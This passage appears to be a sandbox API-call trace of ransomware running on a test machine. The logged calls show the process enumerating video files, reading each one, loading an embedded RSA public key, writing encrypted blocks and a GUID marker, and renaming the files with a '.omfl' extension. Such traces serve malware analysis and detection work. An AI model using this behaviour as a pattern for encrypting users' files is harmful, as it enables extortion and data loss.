hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0131.731] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0131.731] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.731] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0131.731] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.731] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0131.731] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.731] GetCurrentThreadId () returned 0x618 [0131.731] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.731] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2ddb0 [0131.732] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0131.732] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.732] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.732] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.733] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.733] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0131.733] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.733] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.733] GetCurrentThreadId () returned 0x618 [0131.733] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.733] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.733] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.733] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.733] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.733] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.733] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.733] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.733] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0131.733] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.733] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0131.733] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.733] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.733] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.733] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0131.733] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.733] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.733] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0131.733] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.733] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.734] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.734] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.734] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.734] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0131.734] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0131.734] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e18 [0131.734] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.734] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.734] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0131.734] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0131.734] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0131.734] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd171c0 [0131.734] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0131.734] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0131.735] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x10b42, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.735] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.735] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.735] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.735] CloseHandle (hObject=0x610) returned 1 [0131.737] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.737] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0x74fb288 [0131.737] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8V0CIT1lSY9X-f4.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\8v0cit1lsy9x-f4.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8V0CIT1lSY9X-f4.flv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\8v0cit1lsy9x-f4.flv.omfl")) returned 1 [0131.739] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb69e4660, ftCreationTime.dwHighDateTime=0x1d5e52e, ftLastAccessTime.dwLowDateTime=0xbb59f270, ftLastAccessTime.dwHighDateTime=0x1d5dc56, ftLastWriteTime.dwLowDateTime=0xbb59f270, ftLastWriteTime.dwHighDateTime=0x1d5dc56, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aQuqK8QzpcTyT", cAlternateFileName="AQUQK8~1")) returned 1 [0131.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2758 [0131.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2cf8 [0131.739] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0131.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.739] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned=".ini" [0131.739] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21413d90, ftCreationTime.dwHighDateTime=0x1d5db09, ftLastAccessTime.dwLowDateTime=0xb5d46460, ftLastAccessTime.dwHighDateTime=0x1d5da72, ftLastWriteTime.dwLowDateTime=0xb5d46460, ftLastWriteTime.dwHighDateTime=0x1d5da72, nFileSizeHigh=0x0, nFileSizeLow=0xe90d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="El1NrMI7idU6XIxQ.flv", cAlternateFileName="EL1NRM~1.FLV")) returned 1 [0131.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.739] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\El1NrMI7idU6XIxQ.flv") returned=".flv" [0131.740] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\El1NrMI7idU6XIxQ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\el1nrmi7idu6xixq.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0131.740] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=59661) returned 1 [0131.740] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.743] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xe8e7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.743] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.744] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.744] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xe90d, lpOverlapped=0x0) returned 1 [0131.744] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.745] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.745] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.745] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.745] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3110) returned 1 [0131.746] CryptCreateHash (in: hProv=0x49d3110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.746] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.746] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.746] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.746] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.746] GetLastError () returned 0x0 [0131.746] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0131.746] CryptReleaseContext (hProv=0x49d3110, dwFlags=0x0) returned 1 [0131.746] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.746] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.746] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0131.746] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.747] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.747] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.747] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xe90d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.747] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.748] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.748] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.748] CloseHandle (hObject=0x610) returned 1 [0131.750] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.750] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0x74fb288 [0131.750] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\El1NrMI7idU6XIxQ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\el1nrmi7idu6xixq.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\El1NrMI7idU6XIxQ.flv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\el1nrmi7idu6xixq.flv.omfl")) returned 1 [0131.752] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x476145c0, ftCreationTime.dwHighDateTime=0x1d5de1e, ftLastAccessTime.dwLowDateTime=0x4b96e190, ftLastAccessTime.dwHighDateTime=0x1d5dfbd, ftLastWriteTime.dwLowDateTime=0x4b96e190, ftLastWriteTime.dwHighDateTime=0x1d5dfbd, nFileSizeHigh=0x0, nFileSizeLow=0x7963, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jNfq5B5qBeyxag.mkv", cAlternateFileName="JNFQ5B~1.MKV")) returned 1 [0131.752] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.752] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jNfq5B5qBeyxag.mkv") returned=".mkv" [0131.752] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jNfq5B5qBeyxag.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jnfq5b5qbeyxag.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0131.753] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=31075) returned 1 [0131.753] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.756] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x793d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.756] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.757] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.757] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x7963, lpOverlapped=0x0) returned 1 [0131.757] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.757] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.757] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.757] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.758] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.758] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.758] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.758] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.758] GetLastError () returned 0x0 [0131.759] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0131.759] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.759] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.759] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.759] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.759] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.759] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.759] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.760] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x7963, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.760] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.760] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0131.760] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.760] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.760] CloseHandle (hObject=0x610) returned 1 [0131.762] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jNfq5B5qBeyxag.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jnfq5b5qbeyxag.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jNfq5B5qBeyxag.mkv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jnfq5b5qbeyxag.mkv.omfl")) returned 1 [0131.763] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.763] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.763] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.765] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf9d98 | out: hHeap=0x4970000) returned 1 [0131.765] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb04b5210, ftCreationTime.dwHighDateTime=0x1d5e76f, ftLastAccessTime.dwLowDateTime=0xfa5f9740, ftLastAccessTime.dwHighDateTime=0x1d5df3f, ftLastWriteTime.dwLowDateTime=0xfa5f9740, ftLastWriteTime.dwHighDateTime=0x1d5df3f, nFileSizeHigh=0x0, nFileSizeLow=0x96f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RD1ggKtKLkvJ.mp4", cAlternateFileName="RD1GGK~1.MP4")) returned 1 [0131.765] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.765] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.765] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.765] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RD1ggKtKLkvJ.mp4") returned=".mp4" [0131.765] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RD1ggKtKLkvJ.mp4" (normalized: 